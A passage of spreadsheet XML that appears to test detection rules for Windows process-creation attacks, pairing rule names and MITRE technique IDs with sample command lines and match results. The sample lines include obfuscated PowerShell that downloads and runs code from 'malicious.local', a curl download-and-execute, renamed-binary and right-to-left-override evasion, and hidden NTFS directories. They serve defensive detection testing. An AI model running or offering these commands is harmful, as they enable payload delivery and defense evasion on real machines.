      <c r="C3235" s="43" t="inlineStr">
        <is>
          <t>Powershell Token Obfuscation - Process Creation</t>
        </is>
      </c>
      <c r="D3235" s="43" t="inlineStr">
        <is>
          <t>deb9b646-a508-44ee-b7c9-d8965921c6b6</t>
        </is>
      </c>
      <c r="E3235" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "$c1='Invoke-'; $c2='Expression'; $run=$c1+$c2; &amp;$run (.('New-Object') Net.WebClient).DownloadString('http://malicious.local/payload')"</t>
        </is>
      </c>
      <c r="F3235" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3235" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3235" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I323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235" s="43" t="n"/>
      <c r="K3235" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3236" ht="15.75" customHeight="1" s="42">
      <c r="A3236" s="43" t="inlineStr">
        <is>
          <t>t1027.009</t>
        </is>
      </c>
      <c r="B3236" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_token_obfuscation</t>
        </is>
      </c>
      <c r="C3236" s="43" t="inlineStr">
        <is>
          <t>Powershell Token Obfuscation - Process Creation</t>
        </is>
      </c>
      <c r="D3236" s="43" t="inlineStr">
        <is>
          <t>deb9b646-a508-44ee-b7c9-d8965921c6b6</t>
        </is>
      </c>
      <c r="E3236" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "&amp;('In'+'voke-E'+'xpression') (.('Ne'+'w-Ob'+'ject') Net.WebClient).DownloadString('http://malicious.local/payload')"</t>
        </is>
      </c>
      <c r="F3236" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3236" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3236" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3236" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3236" s="43" t="n"/>
      <c r="K3236" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3237" ht="15.75" customHeight="1" s="42">
      <c r="A3237" s="43" t="inlineStr">
        <is>
          <t>t1036.002</t>
        </is>
      </c>
      <c r="B3237" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_right_to_left_override</t>
        </is>
      </c>
      <c r="C3237" s="43" t="inlineStr">
        <is>
          <t>Potential Defense Evasion Via Right-to-Left Override</t>
        </is>
      </c>
      <c r="D3237" s="43" t="inlineStr">
        <is>
          <t>ad691d92-15f2-4181-9aa4-723c74f9ddc3</t>
        </is>
      </c>
      <c r="E3237" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$rtlo = [char]0x202E; &amp; "C:\Users\thaim\Desktop\evil_batch${rtlo}fdp.bat""</t>
        </is>
      </c>
      <c r="F3237" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3237" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3237" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3237" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR (e312efd0-35a1-407f-8439-b8d434b438a6); Potential PowerShell Obfuscation Via WCHAR/CHAR (e312efd0-35a1-407f-8439-b8d434b438a6)</t>
        </is>
      </c>
      <c r="J3237" s="43" t="n"/>
      <c r="K3237" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3238" ht="15.75" customHeight="1" s="42">
      <c r="A3238" s="43" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B3238" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir</t>
        </is>
      </c>
      <c r="C3238" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory</t>
        </is>
      </c>
      <c r="D3238" s="43" t="inlineStr">
        <is>
          <t>fff9d2b7-e11c-4a69-93d3-40ef66189767</t>
        </is>
      </c>
      <c r="E3238" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c c^o^p^y %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe</t>
        </is>
      </c>
      <c r="F3238" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3238" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3238" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3238" s="43" t="n"/>
      <c r="J3238" s="43" t="n"/>
      <c r="K3238" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3239" ht="15.75" customHeight="1" s="42">
      <c r="A3239" s="43" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B3239" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir_lolbin</t>
        </is>
      </c>
      <c r="C3239" s="43" t="inlineStr">
        <is>
          <t>LOL-Binary Copied From System Directory</t>
        </is>
      </c>
      <c r="D3239" s="43" t="inlineStr">
        <is>
          <t>f5d19838-41b5-476c-98d8-ba8af4929ee2</t>
        </is>
      </c>
      <c r="E3239" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"NoP" -c "[System.IO.File]::Copy('C:\Windows\System32\rundll32.exe', 'C:\Temp\rundll32.exe')"</t>
        </is>
      </c>
      <c r="F3239" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3239" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3239" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3239" s="43" t="n"/>
      <c r="J3239" s="43" t="n"/>
      <c r="K3239" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3240" ht="15.75" customHeight="1" s="42">
      <c r="A3240" s="43" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B3240" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir_lolbin</t>
        </is>
      </c>
      <c r="C3240" s="43" t="inlineStr">
        <is>
          <t>LOL-Binary Copied From System Directory</t>
        </is>
      </c>
      <c r="D3240" s="43" t="inlineStr">
        <is>
          <t>f5d19838-41b5-476c-98d8-ba8af4929ee2</t>
        </is>
      </c>
      <c r="E3240" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"NoP" /"c" "[System.IO.File]::Copy('C:\Windows\System32\rundll32.exe', 'C:\Temp\rundll32.exe')"</t>
        </is>
      </c>
      <c r="F3240" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3240" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3240" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3240" s="43" t="n"/>
      <c r="J3240" s="43" t="n"/>
      <c r="K3240" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3241" ht="15.75" customHeight="1" s="42">
      <c r="A3241" s="43" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B3241" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir_lolbin</t>
        </is>
      </c>
      <c r="C3241" s="43" t="inlineStr">
        <is>
          <t>LOL-Binary Copied From System Directory</t>
        </is>
      </c>
      <c r="D3241" s="43" t="inlineStr">
        <is>
          <t>f5d19838-41b5-476c-98d8-ba8af4929ee2</t>
        </is>
      </c>
      <c r="E3241" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NoP -"c" "[System.IO.File]::Copy('C:\Windows\System32\rundll32.exe', 'C:\Temp\rundll32.exe')"</t>
        </is>
      </c>
      <c r="F3241" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3241" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3241" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3241" s="43" t="n"/>
      <c r="J3241" s="43" t="n"/>
      <c r="K3241" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3242" ht="15.75" customHeight="1" s="42">
      <c r="A3242" s="43" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B3242" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir_lolbin</t>
        </is>
      </c>
      <c r="C3242" s="43" t="inlineStr">
        <is>
          <t>LOL-Binary Copied From System Directory</t>
        </is>
      </c>
      <c r="D3242" s="43" t="inlineStr">
        <is>
          <t>f5d19838-41b5-476c-98d8-ba8af4929ee2</t>
        </is>
      </c>
      <c r="E3242" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NOp -"c" "[System.IO.File]::Copy('C:\Windows\System32\rundll32.exe', 'C:\Temp\rundll32.exe')"</t>
        </is>
      </c>
      <c r="F3242" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3242" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3242" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3242" s="43" t="n"/>
      <c r="J3242" s="43" t="n"/>
      <c r="K3242" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3243" ht="15.75" customHeight="1" s="42">
      <c r="A3243" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B3243" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C3243" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D3243" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E3243" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F3243" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3243" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3243" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3243" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3243" s="43" t="n"/>
      <c r="K3243" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3244" ht="15.75" customHeight="1" s="42">
      <c r="A3244" s="43" t="inlineStr">
        <is>
          <t>t1134.004</t>
        </is>
      </c>
      <c r="B3244" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3244" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3244" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3244" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Convert]::FromBase64String('d2hvYW1p')"</t>
        </is>
      </c>
      <c r="F3244" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3244" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3244" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3244" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J3244" s="43" t="n"/>
      <c r="K3244" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3245" ht="15.75" customHeight="1" s="42">
      <c r="A3245" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B3245" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_manage_bde</t>
        </is>
      </c>
      <c r="C3245" s="43" t="inlineStr">
        <is>
          <t>Potential Manage-bde.wsf Abuse To Proxy Execution</t>
        </is>
      </c>
      <c r="D3245" s="43" t="inlineStr">
        <is>
          <t>c363385c-f75d-4753-a108-c1a8e28bdbda</t>
        </is>
      </c>
      <c r="E3245" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd /d C:\Windows\System32\ &amp;&amp; cscript.exe //nologo manage-bde.wsf"</t>
        </is>
      </c>
      <c r="F3245" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3245" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3245" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3245" s="43" t="n"/>
      <c r="J3245" s="43" t="n"/>
      <c r="K3245" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3246" ht="15.75" customHeight="1" s="42">
      <c r="A3246" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B3246" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hidden_dir_index_allocation</t>
        </is>
      </c>
      <c r="C3246" s="43" t="inlineStr">
        <is>
          <t>Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI</t>
        </is>
      </c>
      <c r="D3246" s="43" t="inlineStr">
        <is>
          <t>0900463c-b33b-49a8-be1d-552a3b553dae</t>
        </is>
      </c>
      <c r="E3246" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c md %temp%\...$.......::"$index_allocation" &amp; echo too many secrets &gt; %temp%\...$.......::"$index_allocation"\secrets.txt</t>
        </is>
      </c>
      <c r="F3246" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3246" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3246" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3246" s="43" t="n"/>
      <c r="J3246" s="43" t="n"/>
      <c r="K3246" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3247" ht="15.75" customHeight="1" s="42">
      <c r="A3247" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3247" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_zipexec</t>
        </is>
      </c>
      <c r="C3247" s="43" t="inlineStr">
        <is>
          <t>Suspicious ZipExec Execution</t>
        </is>
      </c>
      <c r="D3247" s="43" t="inlineStr">
        <is>
          <t>90dcf730-1b71-4ae7-9ffc-6fcf62bd0132</t>
        </is>
      </c>
      <c r="E3247" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cmdkey.exe /del^ete:Microsoft_Windows_Shell_ZipFolder:filename=payload.z^ip"</t>
        </is>
      </c>
      <c r="F3247" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3247" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3247" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3247" s="43" t="inlineStr">
        <is>
          <t>Suspicious ZipExec Execution (90dcf730-1b71-4ae7-9ffc-6fcf62bd0132)</t>
        </is>
      </c>
      <c r="J3247" s="43" t="n"/>
      <c r="K3247" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3248" ht="15.75" customHeight="1" s="42">
      <c r="A3248" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B3248" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3248" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3248" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3248" s="43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48" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3248" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3248" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3248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3248" s="43" t="n"/>
      <c r="K3248" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3249" ht="15.75" customHeight="1" s="42">
      <c r="A3249" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B3249" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3249" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3249" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3249" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\temp\custom_host.exe &amp;&amp; C:\temp\custom_host.exe -W Hidden /"C"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49" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3249" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3249" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3249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3249" s="43" t="n"/>
      <c r="K3249" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3250" ht="15.75" customHeight="1" s="42">
      <c r="A3250" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B3250" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3250" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3250" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3250" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\temp\custom_host.exe &amp;&amp; C:\temp\custom_host.exe /"W"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50" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3250" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3250" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3250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3250" s="43" t="n"/>
      <c r="K3250" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3251" ht="15.75" customHeight="1" s="42">
      <c r="A3251" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B3251" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3251" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3251" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3251" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\temp\custom_host.exe &amp;&amp; C:\temp\custom_host.exe -w Hidden -"C"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51" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3251" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3251" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3251" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM (7b6a7418-3afc-11f0-aff4-000d3abf478c); PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3251" s="43" t="n"/>
      <c r="K3251" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3252" ht="15.75" customHeight="1" s="42">
      <c r="A3252" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3252" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C3252" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D3252" s="43" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3252" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F3252" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3252" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3252" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3252" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher (6c96fc76-0eb1-11eb-adc1-0242ac120002)</t>
        </is>
      </c>
      <c r="J3252" s="43" t="n"/>
      <c r="K3252" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3253" ht="15.75" customHeight="1" s="42">
      <c r="A3253" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3253" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3253" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3253" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3253" s="43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3253" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3253" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3253" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3253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3" s="43" t="n"/>
      <c r="K3253" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3254" ht="15.75" customHeight="1" s="42">
      <c r="A3254" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3254" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3254" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3254" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3254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254" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3254" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3254" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3254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4" s="43" t="n"/>
      <c r="K3254" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3255" ht="15.75" customHeight="1" s="42">
      <c r="A3255" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3255" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3255" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3255" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3255" s="4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3255" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3255" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3255" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3255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5" s="43" t="n"/>
      <c r="K3255" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3256" ht="15.75" customHeight="1" s="42">
      <c r="A3256" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3256" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3256" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3256" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3256" s="4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3256" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3256" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3256" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3256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6" s="43" t="n"/>
      <c r="K3256" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3257" ht="15.75" customHeight="1" s="42">
      <c r="A3257" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3257" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3257" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3257" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3257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3257" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3257" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3257" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3257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7" s="43" t="n"/>
      <c r="K3257" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3258" ht="15.75" customHeight="1" s="42">
      <c r="A3258" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3258" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C3258" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D3258" s="43" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E3258" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c ""C:\WINDOWS\System32\IME\SHARED\IMEWDBLD.exe" htt^ps://[raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml)"</t>
        </is>
      </c>
      <c r="F3258" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3258" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3258" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3258" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE (863218bd-c7d0-4c52-80cd-0a96c09f54af)</t>
        </is>
      </c>
      <c r="J3258" s="43" t="n"/>
      <c r="K3258" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3259" ht="15.75" customHeight="1" s="42">
      <c r="A3259" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3259" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3259" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3259" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3259" s="43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3259" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3259" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3259" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3259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3259" s="43" t="n"/>
      <c r="K3259" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3260" ht="15.75" customHeight="1" s="42">
      <c r="A3260" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3260" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_proxy_execution</t>
        </is>
      </c>
      <c r="C3260" s="43" t="inlineStr">
        <is>
          <t>Program Executed Using Proxy/Local Command Via SSH.EXE</t>
        </is>
      </c>
      <c r="D3260" s="43" t="inlineStr">
        <is>
          <t>7d6d30b8-5b91-4b90-a891-46cccaf29598</t>
        </is>
      </c>
      <c r="E3260" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\WINDOWS\System32\OpenSSH\ssh.exe" -o Per^mitLocalCommand=yes -o LocalCommand=calc.exe adversary-host</t>
        </is>
      </c>
      <c r="F3260" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3260" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3260" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3260" s="43" t="inlineStr">
        <is>
          <t>Program Executed Using Proxy/Local Command Via SSH.EXE (7d6d30b8-5b91-4b90-a891-46cccaf29598)</t>
        </is>
      </c>
      <c r="J3260" s="43" t="n"/>
      <c r="K3260" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3261" ht="15.75" customHeight="1" s="42">
      <c r="A3261" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3261" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C3261" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D3261" s="43" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E3261" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "svchost.exe --m^eshServiceName"</t>
        </is>
      </c>
      <c r="F3261" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3261" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3261" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3261" s="43" t="inlineStr">
        <is>
